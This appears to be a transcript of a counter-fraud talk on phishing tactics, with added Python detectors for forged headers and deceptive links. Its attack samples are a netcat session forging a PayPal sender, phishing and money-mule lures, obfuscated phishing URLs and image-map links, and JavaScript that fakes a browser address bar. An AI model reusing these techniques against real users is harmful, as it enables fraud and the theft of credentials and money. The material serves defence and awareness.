
A Primer on Phishing Tactics



Presentation Transcript


  1. A Primer on Phishing Tactics: Practical Counter-Fraud Solutions

  2. Introduction

  About Me: Tod Beardsley, todb@planb-security.net. Employed at TippingPoint, a division of 3Com, as Lead Counter-Fraud Engineer.

  About Phishing:
  • Massive growth over the last 18 months.
  • The ChoicePoint and LexisNexis hacks are great targets, but 0wning your mom's bridge friends is a lot easier.
  • Very effective at convincing said mom's friends.

  3. The Lure

  4. The Catch

  5. The Catch continued

  6. Profit!

  • So now what? Enter the money mules:

    Dear Future Employee,

    We have received your contact information from employment agency. My name is Karl Jorgensen, project coordinator and your direct supervisor at Odono Inc. Please read the information below about our company and your job description.

    Odono Inc. leader in wholesale produce distribution is looking for responsible individuals to be responsible for the areas of shipping operations, customer service, transaction and bank operations.

    Current openings: Transaction Manager

    You will receive transfers for our company, send/receive funds. You should have your local bank branch locating near you, so you can withdraw money from your account within several hours. You should have home, work or cell phone number (preferably), so we can contact you immediately.

    Requirements:
    * Be able to check your email several times a day
    * Be able to respond to emails immediately
    * Be able to work overtime if needed
    * Be responsible and hard working

    If you are interested in this position and meet the minimum requirements please visit and register here: http://www.odono.org/jobs.html

  7. E-Mail Trust Building Tactics

  • Between two and five percent of phishing e-mail is responded to.
  • Several thousand e-mail addresses are used in a given campaign.
  • Compare to spam: a typical, successful run of millions of addresses generates a click-through rate of about 0.01%.
  • Phishing click-throughs are qualified: once hooked, victims almost always provide information to the attacker.

  8. E-mail: Forging From Fields

  • Very complicated task… well, not really. A plain SMTP session to a relay that accepts mail for the victim is enough: the HELO name, the MAIL FROM address and every header inside DATA are asserted by the client and checked by nothing. Note the server even stamps its message ID with the claimed HELO domain.

    C:\>nc mail.cox-internet.com 25
    220 jupiter ESMTP server (InterMail vK.4.04.00.03 201-232-140-20030416 license fe37ca4dbd17753103b2892ad5fc6c09) ready Sat, 4 Jun 2005 02:18:24 -0500
    HELO paypal.com
    250 fe4.cox-internet.com
    MAIL From: accounts@paypal.com
    250 Sender <accounts@paypal.com> Ok
    RCPT To: victim@example.com
    250 Recipient <victim@example.com> Ok
    DATA
    354 Ok Send data ending with <CRLF>.<CRLF>
    Dear Valued Customer,
    Due to a problem with our servers, you need to give us your password right away.
    Please click here: http://www.paypalk.com
    Thank you for your continued patronage.
    .
    250 Message received: 20050604071934.TGZA4425.fe4@paypal.com
    QUIT
    221 fe4.cox-internet.com ESMTP server closing connection
    C:\>

  9. E-mail: Forging Received Fields

  Each MTA prepends its own Received: stamp, so the chain reads newest-first, and only the stamps written by your own servers can be trusted. Everything below the hop that handed the message to your MTA arrived inside the message body and was written by the sender.

  A normal Received path:

    Received: (qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000
    Received: from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000
    Received: from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207]) by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802C for <customer@example.com>; Wed, 18 May 2005 08:46:47 -0700 (PDT)
    Received: (qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000

  A slightly altered Received path:

    Received: (qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000
    Received: from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000
    Received: from paypal.com (smtp1.sc5.paypal.com [64.4.244.74]) by S01060010dcf9b811.vc.shawcable.net with esmtp id ABEFBBB123 for <ageddyn@minitru.org>; Thu, 02 Jun 2005 09:36:35 -0700

  Here the only hop mail.example.com can vouch for is a shawcable.net customer host at 24.81.25.151. The stamp beneath it, claiming the message came from smtp1.sc5.paypal.com, was written by the sender, not by any PayPal server.
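The trust-boundary check described above, written out as an added example (this code is not from the presentation). It walks the Received: chain newest-first, stops at the first stamp written by one of our own MTAs, and reports the hop that stamp vouches for together with every host the lower, sender-supplied stamps claim. The trusted MTA set (mail.example.com) and the sender domain being checked are assumptions for the example; the two header chains are the ones from the slide, wrapped as minimal messages.

```python
import re
from email import message_from_string

# Our own MTA(s). Only Received: stamps written *by* these hosts can be trusted.
# Assumption for this example; substitute your MX and internal relays.
TRUSTED_MTAS = {"mail.example.com"}

RECEIVED_RE = re.compile(r"from\s+(\S+)\s+(?:\(([^)]*)\)\s+)?by\s+(\S+)", re.I)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_received(value):
    """Return (from_host, from_ip, by_host) for a 'from X (...) by Y' stamp.
    Local stamps such as '(qmail 48182 invoked from network)' carry no relay
    information and yield None."""
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    from_host, paren, by_host = m.group(1), m.group(2) or "", m.group(3)
    ip = IPV4_RE.search(paren)
    return from_host.lower(), (ip.group(1) if ip else None), by_host.lower()


def trust_boundary(raw_message, trusted=TRUSTED_MTAS):
    """Walk the Received: stamps newest-first. The first stamp written by one of
    our own MTAs names the last hop we can vouch for (host and connecting IP);
    every stamp below it arrived inside DATA and may say anything."""
    msg = message_from_string(raw_message)
    stamps = [s for s in map(parse_received, msg.get_all("Received", [])) if s]
    for i, (from_host, from_ip, by_host) in enumerate(stamps):
        if by_host in trusted:
            return {
                "boundary_host": from_host,
                "boundary_ip": from_ip,
                "unverified_claims": [s[0] for s in stamps[i + 1:]],
            }
    return None


def looks_spoofed(raw_message, sender_domain, trusted=TRUSTED_MTAS):
    """True when the verified boundary hop lies outside sender_domain while an
    unverifiable stamp beneath it claims to be inside it."""
    tb = trust_boundary(raw_message, trusted)
    if tb is None:
        return None

    def inside(host):
        return host == sender_domain or host.endswith("." + sender_domain)

    return not inside(tb["boundary_host"]) and any(inside(h) for h in tb["unverified_claims"])


# The two header chains from the slide, wrapped as minimal messages (body is filler).
NORMAL = """\
Received: (qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000
Received: from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000
Received: from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207]) by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802C for <customer@example.com>; Wed, 18 May 2005 08:46:47 -0700 (PDT)
Received: (qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000

(body)
"""

ALTERED = """\
Received: (qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000
Received: from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000
Received: from paypal.com (smtp1.sc5.paypal.com [64.4.244.74]) by S01060010dcf9b811.vc.shawcable.net with esmtp id ABEFBBB123 for <ageddyn@minitru.org>; Thu, 02 Jun 2005 09:36:35 -0700

(body)
"""

if __name__ == "__main__":
    for name, raw in (("normal", NORMAL), ("altered", ALTERED)):
        print(name, trust_boundary(raw), "spoofed:", looks_spoofed(raw, "paypal.com"))
```

The point of the design is that the check never reads the lower stamps as evidence of anything except what the sender chose to write; the verdict rests only on the hop your own MTA saw on the wire.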

  10. E-mail: Evading Anti-Spam • Looks like a regular message…

  11. E-mail: Evading Anti-Spam

  • But it's really an inline GIF. Trickiness. The text/html part gives a keyword filter nothing to score: the "message" the reader sees is the GIF, the whole image is covered by an area map pointing at the phisher's host (comannd.com:280) while the enclosing <A> names the real bank, and the only real text is a line of unrelated words in near-white (#FFFFF0) that the reader never notices.

    This is a multi-part message in MIME format.
    --------------060608080401000901030005
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit

    <html><p><font face="Arial"><A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map><img SRC="cid:part1.07060107.05040003@custservice_id_6142187@southtrust.com" border="0" usemap="#rtaiz"></A></a></font></p><p><font color="#FFFFF0">Tennis Warner Bross Alyssa Milano XFL Cheerleaders Metallica </font></p></html>
    --------------060608080401000901030005
    Content-Type: image/gif; name="bergman.GIF"
    Content-Transfer-Encoding: base64
    Content-ID: <part1.07060107.05040003@custservice_id_6142187@southtrust.com>
    Content-Disposition: inline; filename="bergman.GIF"

    R0lGODlhYgJrAfOFAAUIAKbK8ICAgABgwACAwCCAwECAwECgwGCgwICgwIDAwP/78AAA/////wAAAAAAACH5BAQAAAAALAAAAABVAmMBAAT/sMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgs Go/IpHLJbDqf0Kh0Sq1ar9isdsvter+dhXhMLpvFgYACQQC73/C4/BpAFAiDvH7P7/fngIGCg4QxAQV+ […]

  12. E-Mail: Misdirection and Redirection

  • Crafted "automatically generated" links: the visible text names one bank, the href points at a bare IP hosting a copy of another.
    <A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A>

  • Hex-encoded URLs: printable ASCII in the host and path is %-escaped so the address does not look like a raw IP to the reader or to a naive filter.
    http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php
  decodes to:
    http://210.219.241.125/images/paypal/cgi-bin/webscrcmd_login.php

  • Overlapping area map tags: the <A> carries the real bank's URL, which is what a link extractor that stops at the first href sees, but the <AREA> covering the image is what the click actually follows.
    <A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>

  • Open redirection services

  13. E-Mail: Misdirection and Redirection continued • Obfuscation Services

  14. E-Mail: Cutting Out the Web Site Entirely

  15. Detecting Phishy Links

  Best and most Draconian:
  • No HTML-rendered e-mail, ever.

  More realistic:
  • No hex-encoded printable ASCII characters in domain names.
  • No HTTP link containing "http" more than once.
  • No nested <A> and <AREA> links.
  • Correlate obfuscation techniques to From addresses.

  Is there some reason anti-spam can't handle this already?
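The "more realistic" rules above, plus the text-versus-href mismatch from slide 12, as an added example (not code from the presentation). It pulls every <a href> out of an HTML part, notes any <area href> nested inside it, and applies the checks. The sample inputs are the snippets from slides 11 and 12; the anchor text wrapped around the hex-encoded URL and the redirector link on www.example.com are constructed for the example. The rule set and wording of the findings are this example's own choices.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

HEX_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")
LOOKS_LIKE_URL = re.compile(r"(?i)(https?://)?[\w.-]+\.[a-z]{2,}")


def hostname(url):
    """Host part of a URL, lowercased; '' if the URL does not parse."""
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def url_findings(href, text=""):
    """Apply the slide's link heuristics to one href and its visible text."""
    findings = []
    raw_host = urlsplit(href).netloc        # taken before decoding so %xx survives
    # Rule: hex-encoded *printable* ASCII in the domain, e.g. %32%31%30 for "210".
    if any(0x20 <= int(esc[1:], 16) < 0x7F for esc in HEX_ESCAPE.findall(raw_host)):
        findings.append("hex-encoded printable ASCII in domain")
    # Rule: "http" more than once, the signature of a redirector or a URL-in-URL.
    if href.lower().count("http") > 1:
        findings.append("'http' appears more than once")
    # Rule (slide 12): the visible text is itself a URL/host that is not where the href goes.
    shown = text.strip()
    if LOOKS_LIKE_URL.match(shown):
        shown_host = hostname(shown if "://" in shown else "http://" + shown)
        real_host = hostname(unquote(href))
        if shown_host and shown_host != real_host:
            findings.append(f"link text says {shown_host} but href goes to {real_host}")
    return findings


class LinkExtractor(HTMLParser):
    """Collect each <a href> with its visible text and any <area href> nested inside it."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._open = {"href": a["href"], "text": "", "area_hrefs": []}
            self.links.append(self._open)
        elif tag == "area" and a.get("href") and self._open is not None:
            self._open["area_hrefs"].append(a["href"])

    def handle_endtag(self, tag):
        if tag == "a":
            self._open = None

    def handle_data(self, data):
        if self._open is not None:
            self._open["text"] += data


def scan_html(html):
    """Return [(href, [findings...]), ...] for every link that trips a rule."""
    parser = LinkExtractor()
    parser.feed(html)
    report = []
    for link in parser.links:
        found = url_findings(link["href"], link["text"])
        for area in link["area_hrefs"]:
            # Rule: nested <A>/<AREA>; the area, not the anchor, is what the click follows.
            found.append(f"<area> nested in <a>: clicks go to {area}, not {link['href']}")
            found += url_findings(area)
        if found:
            report.append((link["href"], found))
    return report


# Samples: the first three are from slides 11 and 12 (anchor text around the hex URL
# is constructed); the redirector on www.example.com is constructed.
SAMPLES = {
    "crafted": '<A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A>',
    "hex": '<a href="http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php">Log in</a>',
    "areamap": '<A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map><img src="cid:x" usemap="#rtaiz"></A>',
    "redirect": '<a href="http://www.example.com/redir?url=http://comannd.com:280/">Secure login</a>',
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(name, scan_html(html))
```

The hex rule deliberately looks at the undecoded netloc: once a URL has been normalised the escapes are gone and the giveaway with them. The nesting rule is the one a mail client gets wrong most often, since the status bar and many link scanners report the <A> while the browser follows the <AREA>.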

  16. Web Site Trust Building

  • Once you're on the page, you're pretty much compelled to execute.
  • Pages today are much more cookie-cutter than their e-mail lures.
  • Sometimes pages don't match up with the bank; how significant is this?
  • The pages themselves may suck, but the exploits being used to control the web servers… well, they kind of suck too.

  17. The Magic of Copy and Paste

  • Yes, quite magical. File | Save As | Upload | Done.
  • Typically the only elements that need touching are perhaps the image locations, some of the JavaScript source files, and redirecting the <FORM> to your PHP form mailer.
  • Many leave traces of their copying:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <!-- saved from url=(0036)http://secure.netbank.com/login.htm -->
    <HTML><HEAD><TITLE>NetBank Account Login</TITLE>

  18. window.createPopup

    // Fake Location Bar: an IE-only chromeless popup (window.createPopup) drawn
    // over the real address bar, showing a legitimate-looking https:// URL.
    var vuln_x, vuln_y, vuln_w, vuln_h;

    function vuln_calc() {
        // Work out where the overlay must sit relative to the browser window.
        var root = document[(document.compatMode == 'CSS1Compat') ? 'documentElement' : 'body'];
        vuln_x = window.screenLeft + 72;
        vuln_y = window.screenTop - 20;
        vuln_w = root.offsetWidth - 520;
        vuln_h = 17;
        vuln_show();
    }

    var vuln_win;

    function vuln_pop() {
        // Create the popup and fill it with the fake URL text.
        vuln_win = window.createPopup();
        vuln_win.document.body.innerHTML = vuln_html;
        vuln_win.document.body.style.margin = 0;
        vuln_win.document.body.onunload = vuln_pop;   // re-open it if it gets dismissed
        vuln_show();
    }

    function vuln_show() {
        if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
    }

    var vuln_html = '<div style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.usbank.com/secure/-run</div>';

  19. window.createPopup continued

  20. window.createPopup continued

  Presto Change-o. But why bother?
  • Many sites incorporate this code, probably just due to cookie-cutter practices.
  • The victims of phishing don't usually qualify the sites they visit off the Location Bar anyway, or anything else in the browser.

  21. Signed, Sealed… Who Cares? Thank you, Verisign! A more obvious and much easier to forge security seal.

  22. Verisign Spoofery Continued

  23. Conclusions

  • It is silly to think that users will take care of themselves. A decade of wildly successful spam campaigns proves this. (75% of all Internet e-mail is junk mail today.)
  • The only reason people notice phishing is that traditional anti-spam has failed to catch it, partly because the keywords are already in everyone's "known good" set, and because people whitelist e-mail from their banks.
  • The overmarketing and near-total lack of understanding of SSL is also partly to blame. Browsers are terrible at preventing this out of the box, and this is one thing they ought to be good at.
  • A billion dollars a year of capital flight kind of sucks, and it's probably more.
  • Not all phishers are ID10Ts. Some use very advanced techniques, write effective malware, and deploy very complex networks of SMTP and HTTP relays to conduct their business.

  24. Thank You. todb@planb-security.net
